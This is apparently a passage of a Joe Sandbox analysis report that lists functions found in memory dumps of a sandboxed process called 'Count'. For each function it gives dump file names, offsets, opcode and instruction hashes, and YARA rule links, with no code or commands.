Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab1ee97b4634ce861c574fa9ac42501328511194f3f6db850a5a035d5148a1e
Instruction ID: 3ff472cec653ee9e64c40e21440a3c1265dac54e6aa23e41fe8e7a895c106ce1
Opcode Fuzzy Hash: 3ab1ee97b4634ce861c574fa9ac42501328511194f3f6db850a5a035d5148a1e
Instruction Fuzzy Hash: 9A219270E00208DFDB44DF69E841AAEBBF2FB88300F10C465D805AB364DBB4A946CF94

Function 0551D718 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45b13e4045c07400caf74da8fe12a59348939d6edc8e4cf4ff087c40987e932
Instruction ID: 036d376002e747611f1aae414ed1709855a6822d2a676b25b1b206559149c19e
Opcode Fuzzy Hash: b45b13e4045c07400caf74da8fe12a59348939d6edc8e4cf4ff087c40987e932
Instruction Fuzzy Hash: 73214A70E00209DFDB44DFA9D845BEEBBF2BB88300F108465D81AA7264EB345A45CFC5

Function 061DA1F8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9449ecb7ce4726ae3737cee56f27f3bd576e688430e515225643ec39a5fc7a3b
Instruction ID: 1603d2c8cb4d364d9b66ce69749044fdfa8c6509f5b1aab4bf5a4cf8a3288853
Opcode Fuzzy Hash: 9449ecb7ce4726ae3737cee56f27f3bd576e688430e515225643ec39a5fc7a3b
Instruction Fuzzy Hash: D3210635A402198FDB55DFA9C944ADDB7F2FF88314F1041A5E405AB2A5C732AD85CBA0

Function 061D1DA0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b6f8bfcd7640a7b10e767591accfd7f4a27dbd9a9de3071fd2e85fcef586b9
Instruction ID: afd035c0218f40ef2aba3b7386b34295948fe102334131ba30a69157101d8102
Opcode Fuzzy Hash: 05b6f8bfcd7640a7b10e767591accfd7f4a27dbd9a9de3071fd2e85fcef586b9
Instruction Fuzzy Hash: 2A21D1307102114FC794EB7DE9457AEBFEAEB88300F008A3DE10BD7695DB70994A8B90

Function 0551C618 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216ddb2fbbcfce7cea49a4932aae0afc081202012675680b041deef87855fa0b
Instruction ID: bc304d6617e521fd0fe8ded22f0ee57caf55f79c50be743002a39dd88e59bea6
Opcode Fuzzy Hash: 216ddb2fbbcfce7cea49a4932aae0afc081202012675680b041deef87855fa0b
Instruction Fuzzy Hash: C931C274905268CFEBA4CF28D844BD9BBB5FB49300F1081EAD40DA7294DB705E89CF45

Function 0551C107 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d9cda753662f9af34f3be2d7cb2f0f840b474c7733c2998ca20aa584a3cbd2a
Instruction ID: 4665af7af9b20ee12bc6162089af8045c3dc4758a74aca2fad419125e9eaa675
Opcode Fuzzy Hash: 7d9cda753662f9af34f3be2d7cb2f0f840b474c7733c2998ca20aa584a3cbd2a
Instruction Fuzzy Hash: 3F318074A05628CFEBA4DB18D894BD9BBB2FB49310F1081E9D80DA7694DB305EC9CF45

Function 055181D8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1bca649cf3690334e6467ba8b99d0ca12d52ecd84658807ea682751d8b17fb
Instruction ID: 860c0f2ef31d9aace86929b6b9bc3b57632165404f12f52c7bc6db66227639ea
Opcode Fuzzy Hash: 4c1bca649cf3690334e6467ba8b99d0ca12d52ecd84658807ea682751d8b17fb
Instruction Fuzzy Hash: FE215C70D04609DFDB04DFD9D845AEEBBBAFB49300F108428E415A7295CB745A49CF96

Function 061E7770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e38a5035ba7b971cf7f40ea060cce1dccde4db116a14ceaa34fb56ae402d15
Instruction ID: 1f47de3f988f9a8486f98953dd47e35a3d0d3ab2f88e2b69bbdf7e89b5e3292e
Opcode Fuzzy Hash: 32e38a5035ba7b971cf7f40ea060cce1dccde4db116a14ceaa34fb56ae402d15
Instruction Fuzzy Hash: 38213BB0E04609CFEB48DFA9D444AAEBBF5FB48300F10C5A9D415A7290D7349982CF91

Function 061EE378 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec7d002fe4dd3407fbd13788b8e7e7bd33d2ea32c6239666f090295d4dc2dea
Instruction ID: 1828e0ddf3bc703d1f876df2dbfed4f5315097613ea312f40df93ab8e024db62
Opcode Fuzzy Hash: aec7d002fe4dd3407fbd13788b8e7e7bd33d2ea32c6239666f090295d4dc2dea
Instruction Fuzzy Hash: 3F218E70900628DFDB58DF65D8547DDBBB6FB89301F0084A8E54AA7295CB7099C4CF51

Function 0551C2C1 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081c5bb370c8f6667cd386dcead9dcd46c4a92c399bfe1677e1275d5435052e8
Instruction ID: 595498fbbebc2ab86f283e1b181a0b0d7494b2642c4491f0ea5f9d7353c2f0ca
Opcode Fuzzy Hash: 081c5bb370c8f6667cd386dcead9dcd46c4a92c399bfe1677e1275d5435052e8
Instruction Fuzzy Hash: 8131B274905218CFEBA4CF28D944BD9BAB1FB49314F1081E9D40DA76A4CB715EC8CF45

Function 061DA1F5 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9510e86cd09677bf168e4bce8f8aaed081272c1af4430c50c127671c64100ad2
Instruction ID: f881013cd34e2df79c68c458165e4ca0f5ee39e4a8308f26d01368fc193c6960
Opcode Fuzzy Hash: 9510e86cd09677bf168e4bce8f8aaed081272c1af4430c50c127671c64100ad2
Instruction Fuzzy Hash: B7213A31A40219CFDB55DFA5C944ADDB7F2BF88304F2046A5E405BB3A5DB329D81CBA0

Function 0551BC56 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abac69c08ac18e1ec92f8c35a2246d738022a27b9cee96fbfbdb5074058a187a
Instruction ID: c1d0568f766106cf5b7762fe1814a0616056fcde4dd3f524fa58b81b103840fb
Opcode Fuzzy Hash: abac69c08ac18e1ec92f8c35a2246d738022a27b9cee96fbfbdb5074058a187a
Instruction Fuzzy Hash: 9931CF74906268CFEBA4CF18D844BD9BAB1FB49310F1081EAD80DA76A4CB705EC9CF45

Function 05519A00 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c3715a4ea63ad27af397aafd8c8302fb2b105038fb6f0954f422bc70dffb76
Instruction ID: c1099904e11ff351f7fbe00dafa11c060843e840bfeb52e08c9af50858c6fab3
Opcode Fuzzy Hash: 84c3715a4ea63ad27af397aafd8c8302fb2b105038fb6f0954f422bc70dffb76
Instruction Fuzzy Hash: 5011386645C248EFF705CBA4CCA2AD9BFF4FF46310F084699E80197251CE2A4406C7A9

Function 0551C52E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d580d1a147450f9dbb1ea908c9d8db5ad69d6baa86746f2f0f6c42e3b68aec3
Instruction ID: 1981cf2357369eb0698ece0afe1e97cdf9e5302a43220f9bf6bfd262b4d82c4e
Opcode Fuzzy Hash: 3d580d1a147450f9dbb1ea908c9d8db5ad69d6baa86746f2f0f6c42e3b68aec3
Instruction Fuzzy Hash: FA31A074901628CFEBA0DF28D844B99BBB1FB49310F1082E9D40DA3654DB715AC9CF45

Function 0551BD45 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c458d0e98ca0ca241e00919006992a9e5f6727c68eb2c02029e54833701daf7b
Instruction ID: 115537f42e321effba68c710c75e6e83acf4186c826681ae28878bff28ab8bd2
Opcode Fuzzy Hash: c458d0e98ca0ca241e00919006992a9e5f6727c68eb2c02029e54833701daf7b
Instruction Fuzzy Hash: 9F21AE74A05228CFEBA0CF28D944BD8BAB1FB49314F1081EAD40DA7694CB715EC9CF45

Function 0551BFFD Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07956b2ace20bc32f67671bc6707ccae2db31a1ed07893ab20500503f1f93580
Instruction ID: 5711bd76e193559c2fff70ae7dbfc1f3869d0dd5bdb20755af4f55df77b474e5
Opcode Fuzzy Hash: 07956b2ace20bc32f67671bc6707ccae2db31a1ed07893ab20500503f1f93580
Instruction Fuzzy Hash: BF21CE74905228CFEBA4CF28D884BD8BBB2FB49310F1081E9D40DA76A5CB315E89CF45

Function 061DA148 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45eed22ff3e166206f86f4fb187423e654abe277f64ec7a3409b1215a0e12748
Instruction ID: 0a5905ad1fa372d75bf32f7e8e81e4e5e8a7bdcd5ef41177fae4cabbd52b4c49
Opcode Fuzzy Hash: 45eed22ff3e166206f86f4fb187423e654abe277f64ec7a3409b1215a0e12748
Instruction Fuzzy Hash: E9118E35700615DFDB69AB38E81897D37A6EFD8261704802AE816CB361DF35CC42CB90

Function 00B60C4F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92c345b57e91108ea2d6f2da54fe0c5edf96b3c2bd96be3fb222b64d191ed0d
Instruction ID: fc5e814bf6b06813033f9a90aaa1a9ec08389db43d6716dbd4ad6fb34f70e051
Opcode Fuzzy Hash: c92c345b57e91108ea2d6f2da54fe0c5edf96b3c2bd96be3fb222b64d191ed0d
Instruction Fuzzy Hash: 9C1149317001148BCB19AB69E4546BD33B7FBC9316F144928E1169B3A4CF79DC8A9B92

Function 0081D02B Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2026518919.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81d000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 1c433399811d08d0356d5858bade6c7b1a30a3cb82668c8589c5e47be0ed9330
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: D811BE76504680DFCB12CF14D9C4B56BF61FB88314F24C2AAD8094B656C33AD85ACBA2

Function 061D31E0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0bee65b9d57c775f5ada8e1080d0e993245f9c2921cef03d6e6f12edaa1557
Instruction ID: 31413aa01f4d105a9b1aca3c1972bd0125663fe6101e212a1c55af9566d9febf
Opcode Fuzzy Hash: 7a0bee65b9d57c775f5ada8e1080d0e993245f9c2921cef03d6e6f12edaa1557
Instruction Fuzzy Hash: 1911A075F002549FDB949FB89854BAA7BF2AB89640F044029E666EB380DB30C941CBE1

Function 061D2F49 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87b29e01c179a5e5d9f9b36cffafd76868ff6f2be99bc6709a05c8d9186dbd9
Instruction ID: 297f0b6bfac6c7b5965aae3d45c40f642dcc685014a7b6e4333aaa65cc1028c6
Opcode Fuzzy Hash: c87b29e01c179a5e5d9f9b36cffafd76868ff6f2be99bc6709a05c8d9186dbd9
Instruction Fuzzy Hash: A1218E78A42219AFCB04CFA8D594EADB7F2BF49300F204458F912EB360CB34AD41CB50

Function 0551C5D9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c18fd4ca8ef26fbd94cabcefd14d8f5b94e0ec155b0879bf3592fa2e500e04
Instruction ID: 4d9502784b6a1c21c1ddd3bac4930b74538e9b88fb9667ab12d45f74e974f6f8
Opcode Fuzzy Hash: e0c18fd4ca8ef26fbd94cabcefd14d8f5b94e0ec155b0879bf3592fa2e500e04
Instruction Fuzzy Hash: 9221AE74905228CFEBA0CF18D884B98BBB5FB49314F1081E9D40DA7694DB715A89CF45

Function 0551BEA1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff599997a743dc73e6ee35430d999bd765b3fb440d18b6b006348cbf6158b4db
Instruction ID: 4cab97d4afb0f0b944f9421191a2561ee51b8c6c03df9b485299216820bfc8d5
Opcode Fuzzy Hash: ff599997a743dc73e6ee35430d999bd765b3fb440d18b6b006348cbf6158b4db
Instruction Fuzzy Hash: 6C21B074A05228CFEBA4CF18D984B99BBB2FB49310F1081E9D40DA36A4DB315EC9CF45

Function 061E7760 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6bfc316a8c0c0237d48b04c62cae11dd211e23e1f85f38786a2f28eb9235a9
Instruction ID: 5817e36c3c5ac6dfbb68c4366efbaf076eac79cd35d6eafba5ceb8cf703c63b3
Opcode Fuzzy Hash: 5e6bfc316a8c0c0237d48b04c62cae11dd211e23e1f85f38786a2f28eb9235a9
Instruction Fuzzy Hash: A5116DB0D09309CFEB88DFA9D8452AEBBB5FF49310F1584AAD408D6251D7318581CF91

Function 0551CD91 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570cebf0e8601752b29d4067eb378752fa542bdf4e72d9a1b4411b036a610012
Instruction ID: 072ae44e9fd91743d91654c4423314a15e83df6e930a6172c846f33b04fd30d3
Opcode Fuzzy Hash: 570cebf0e8601752b29d4067eb378752fa542bdf4e72d9a1b4411b036a610012
Instruction Fuzzy Hash: 0E21D674A042289FDB54DF68D850BD9BBB2FF49700F0080E9E509A73A5DB305E85DF52

Function 0551C6D2 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f94d8b2093a1e5352f2712b15f32bb2651cfab5a6e729d66eafceeeab6f635
Instruction ID: 721c0ff9ac1464880e8adbe67542d58ebd414c240075b26a2761199903c6d4c1
Opcode Fuzzy Hash: 29f94d8b2093a1e5352f2712b15f32bb2651cfab5a6e729d66eafceeeab6f635
Instruction Fuzzy Hash: FF21E274905218CFEBA4CF28D884BD9BAB5FB49310F1081E9D80DA76A4CB315EC9CF49

Function 061D3E80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3e7780cc09de024c4db874d6e3e8adafd2bfccd312709532c08e65be6b2832
Instruction ID: 98199ad4e149c8e29c629dc75b80197b5c8590d2a1836f8cafa1bb59cd7a98e7
Opcode Fuzzy Hash: de3e7780cc09de024c4db874d6e3e8adafd2bfccd312709532c08e65be6b2832
Instruction Fuzzy Hash: AA01D833A042586FD794DE9ED044BDAFFE4EB55260F1480ABE484DB290D732ED90C760

Function 05517FED Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcbf0f1ecf437acbea9ba5358c405965010cd10717d2f664498f1b83be6cbda
Instruction ID: 131bb67883450f252ec78b692e22d69a73a14854f3d005b0de8c1d7a085ba69d
Opcode Fuzzy Hash: 5dcbf0f1ecf437acbea9ba5358c405965010cd10717d2f664498f1b83be6cbda
Instruction Fuzzy Hash: 9D113470D04608CFE765CFA8E018AECBFF2FB0A345F508025D809A7265C7756886CF09

Function 061D4480 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51992552485f534c8f67b081ec3982f5307965a1e0c0d0754267c8c34871cd96
Instruction ID: 5182835fdbcdf974765bc0ea67e4d4728ac9d662fe30698ce3482604fe91bf32
Opcode Fuzzy Hash: 51992552485f534c8f67b081ec3982f5307965a1e0c0d0754267c8c34871cd96
Instruction Fuzzy Hash: B0117071E0020A9FCB44DF99C8815AEFBFAFF88204B108439D659A7344DB30AD4687D1

Function 061DA13A Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455104185510aa2344cdf14a2e2ace71e566821e1fc1fa05812685f80057bb4f
Instruction ID: 37615dfc3ca0d86a5e33d9f1766e871f3f29f2de0358184578df594fb8c6a5ef
Opcode Fuzzy Hash: 455104185510aa2344cdf14a2e2ace71e566821e1fc1fa05812685f80057bb4f
Instruction Fuzzy Hash: F3119635700611DFDB99AB34D81896937B6FF89251715816AE816CB372DF35CC02CB91

Function 00B60840 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c07bca05290c5b553a0cca833b56097a8f485ea9c585a7ded53d78808cecf5e
Instruction ID: 226afe9efd2da76c2d86a4a33ebec309698db6378d969c52bbce141733dfa9c6
Opcode Fuzzy Hash: 9c07bca05290c5b553a0cca833b56097a8f485ea9c585a7ded53d78808cecf5e
Instruction Fuzzy Hash: 91014535B043008FC341AB28D414B597BE2FF86714F4180E5E505CF3A2EB749C06CBA2

Function 061D2E28 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91747cf12b66828c909769ef3b0dc478945127921a0fc48ba3e5211fbe104785
Instruction ID: 2f66b0727be35cc5abc72de7e907bc0e4b15cb8a8f6bc5cee8e32b7efeb4a3b8
Opcode Fuzzy Hash: 91747cf12b66828c909769ef3b0dc478945127921a0fc48ba3e5211fbe104785
Instruction Fuzzy Hash: 4F014436340215AFDB109F69DC84F9A77A9EB89B21F108066FA15DB291C7B1D914CB50

Function 0551BC71 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468176269ce651431b93f294c086a9e7ca8dd098c1d3a095e45a97ebd40224c3
Instruction ID: a063460f7914c38a03889cba8eadb472ad82895e78f40f871ea12e0cc492cdba
Opcode Fuzzy Hash: 468176269ce651431b93f294c086a9e7ca8dd098c1d3a095e45a97ebd40224c3
Instruction Fuzzy Hash: 9321E474A05218CFEBA0CF28D850BD9BBB6FB49310F1081E9D80DA76A4CB315E89CF45

Function 061DF5C2 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fae71d4d433dab02ae948a5b72222d9293bca039d4743e7a9604337e8c8508
Instruction ID: 5b7cce8f2579c4ad8d78197937020387ecedd7e62be81cc46744312fde17ba03
Opcode Fuzzy Hash: f4fae71d4d433dab02ae948a5b72222d9293bca039d4743e7a9604337e8c8508
Instruction Fuzzy Hash: 2C019278300610AFC3059B34D824D5A7BA2EBCD76170081A9E5068B3A5CB35EC82CB91

Function 0551FB60 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447eaaaee4ccebc68d39f9008fdad30164796fcd9292041814e07d4cc4ec60d2
Instruction ID: 38a7225f49a040be2775166c29d7fe42d2797064ed4a87677545ad3764e1357c
Opcode Fuzzy Hash: 447eaaaee4ccebc68d39f9008fdad30164796fcd9292041814e07d4cc4ec60d2
Instruction Fuzzy Hash: 0F11D2B4E0420ADFCB44DFA9D5819AEBFF6BF88300F1085699815A7324DB305A81CFA0

Function 0551BE56 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0842ac2542b99dd8f0b5b158f20a2ed704b7208fbff101afe176428bc6d6cf54
Instruction ID: 5cb0725215c628cc0c1e6799823eff151d13bc3c4666280d77c73cb1a734901c
Opcode Fuzzy Hash: 0842ac2542b99dd8f0b5b158f20a2ed704b7208fbff101afe176428bc6d6cf54
Instruction Fuzzy Hash: E721C474906228CFEBA0DF28D854BD9BBB5FB49310F1081E9E40DA76A4CB315E89CF45

Function 061DB408 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fdedab6965ca5d3a1ad9407a044c289f513dc5d62ee5a1ba42711f58d160c8
Instruction ID: 78fc7ace2852a968ac78c47ff6e4b4e658dfac4e7df71020e014a7a254bf9f9a
Opcode Fuzzy Hash: f4fdedab6965ca5d3a1ad9407a044c289f513dc5d62ee5a1ba42711f58d160c8
Instruction Fuzzy Hash: 1DF0C8327043004FC7019A1AEC8488AFBAAEFC5260304853AE14BC722ADB709D4A8790

Function 061D4470 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092734f574514ca3b4952ea480241787331f78c679a1d7068877fcd76ab92b08
Instruction ID: b4fcdc16340431d3f0c712649ff8a59491c103b37ae3bc23ef4f5f15453816a9
